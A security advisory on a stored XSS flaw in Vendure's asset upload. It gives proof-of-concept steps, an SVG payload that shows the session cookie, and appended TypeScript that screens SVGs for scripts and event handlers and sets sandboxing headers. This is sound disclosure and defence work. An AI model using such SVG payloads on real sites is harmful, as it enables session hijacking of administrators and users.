Overview
Vendure versions 0.1.0-alpha.2 to 1.5.1 are affected by a stored XSS vulnerability: an attacker with catalog permission can upload an SVG file containing malicious JavaScript through the “Assets” tab. The uploaded file affects administrators as well as regular users who view it.
Details
The Vendure application is affected by a stored XSS vulnerability: an attacker with catalog permission can upload an SVG file containing malicious JavaScript through the “Assets” tab. Because the file is stored and later served back as an SVG document, the script runs in the browser of anyone who previews it, administrators as well as regular users.
PoC Details
Access the login page in the browser and log in as a low-privileged user that has catalog permissions. Now navigate to the “Assets” tab under “Catalog” and upload the SVG file with the malicious JavaScript payload (found in the PoC Code section). In another browser, log in as an administrator with super admin privileges. Navigate to “Assets” under “Catalog”, click on the uploaded SVG file and preview it. Once the link in the right corner is clicked, the XSS is triggered.
PoC Code
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <!-- The script element is what executes when the stored SVG is previewed -->
  <script type="text/javascript">
    alert(document.domain + '\n' + document.cookie);
  </script>
</svg>
Affected Environments
0.1.0-alpha.2 to 1.5.1
Prevention
Upgrade to version 1.5.2 or higher.
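The advisory does not state what changed in 1.5.2, so the following is an added example of the two controls a defender would apply to an asset pipeline like the one described above; it is not Vendure's own code. It screens SVG uploads for active content (script elements, event-handler attributes, javascript: URLs, foreignObject and embedded-document elements) and chooses response headers that keep a stored SVG from running script when it is previewed. The function names, the regular-expression heuristic and the sample SVGs are all assumptions constructed for this example.

```typescript
// Added example, not Vendure's own code: a defensive screen for uploaded SVGs.
// Layer 1 refuses SVG uploads that carry active content; layer 2 picks response
// headers for stored SVGs so that a preview cannot run script in the app origin.

export interface SvgCheckResult {
  safe: boolean;
  reasons: string[];
}

// Heuristic indicators of executable content in an SVG document. This is a
// screen, not a sanitizer: a production fix should parse the XML and allow-list
// elements and attributes rather than rely on regular expressions.
const ACTIVE_CONTENT_PATTERNS: ReadonlyArray<readonly [RegExp, string]> = [
  [/<\s*script\b/i, "script element"],
  [/\bon[a-z]+\s*=/i, "event handler attribute"],
  [/\b(?:href|xlink:href)\s*=\s*["']\s*javascript:/i, "javascript: URL"],
  [/<\s*foreignObject\b/i, "foreignObject element"],
  [/<\s*(?:iframe|embed|object)\b/i, "embedded document element"],
];

export function checkSvgForActiveContent(svgText: string): SvgCheckResult {
  const reasons: string[] = [];
  for (const [pattern, label] of ACTIVE_CONTENT_PATTERNS) {
    if (pattern.test(svgText)) {
      reasons.push(label);
    }
  }
  return { safe: reasons.length === 0, reasons };
}

// Upload-time decision: only SVG assets are screened; anything that fails is refused.
export function acceptUpload(filename: string, body: string): boolean {
  if (!/\.svg$/i.test(filename)) {
    return true; // non-SVG assets are outside the scope of this check
  }
  return checkSvgForActiveContent(body).safe;
}

// Response headers for serving an SVG that came from an untrusted uploader.
// Content-Disposition: attachment stops the browser from rendering the file as
// a document in the application's origin, and the CSP sandbox directive blocks
// script execution even when the file is opened directly.
export function headersForUntrustedSvg(filename: string): Record<string, string> {
  const safeName = filename.replace(/[^A-Za-z0-9._-]/g, "_");
  return {
    "Content-Type": "image/svg+xml",
    "Content-Disposition": `attachment; filename="${safeName}"`,
    "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; img-src data:; sandbox",
    "X-Content-Type-Options": "nosniff",
  };
}

// Constructed samples modelled on the shape of the advisory's PoC (not the PoC itself).
export const BENIGN_SVG = `<?xml version="1.0" standalone="no"?>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>`;

export const SCRIPTED_SVG = `<?xml version="1.0" standalone="no"?>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert(document.domain);</script>
</svg>`;

export const EVENT_HANDLER_SVG = `<svg xmlns="http://www.w3.org/2000/svg">
  <rect width="10" height="10" onload="alert(1)"/>
</svg>`;

console.log(checkSvgForActiveContent(SCRIPTED_SVG)); // { safe: false, reasons: [ 'script element' ] }
```

The upload screen and the response headers are independent layers: the screen keeps known-bad files out of the asset store, while the headers limit the damage from anything the screen misses, which matters because regex screening of SVG is easy to bypass and the headers do not depend on it.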